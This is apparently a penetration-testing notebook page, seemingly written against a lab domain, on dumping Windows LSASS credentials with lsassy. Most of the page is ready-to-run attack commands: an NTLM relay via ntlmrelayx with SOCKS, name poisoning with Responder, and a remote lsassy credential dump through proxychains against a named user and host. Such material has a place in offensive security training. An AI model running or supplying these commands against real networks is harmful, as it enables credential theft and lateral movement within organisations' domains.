# Lsassy

* Use lsassy to get the lsass process stored credentials
* Domain accounts informations are stored in the LSASS process so make a dump of this process can give you more domain accounts and privileges.
* [Lsassy](https://github.com/Hackndo/lsassy) allow you to dump lsass remotely (very more convenient then doing a procdump, download of the lsass dump file and doing pypykatz or mimikatz locally), it do all the painful actions like dump and read lsass content for you (it also dump only the usefull part of the lsass dump optimizing the time of transfer). (lsassy also exist as a cme module)
*

Install LSASSY

```
python3 -m pip install lsassy
```

Run ntlmrelayx.py and wait for a connecting for fernando.alonzo

```
sudo ntlmrelayx.py -socks -smb2support -tf unsigned_smb.txt
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2Fnhw6FVKwGNsOZjy4VPgJ%2Fimage.png?alt=media&#x26;token=f4bbb649-4ac8-4b37-b868-b99443086f6d" alt=""><figcaption></figcaption></figure>

Run Responder

```
sudo responder -I enp0s3
```

Run LSASSY

```
proxychains lsassy --no-pass -d NORTH -u fernando.alonzo 192.168.56.22
```

![](https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2Fqn6KMQdBKcHKW5LB7N9Y%2Fimage.png?alt=media\&token=5e8b2b7b-b97a-4f25-bbcf-9bee8eafc53a)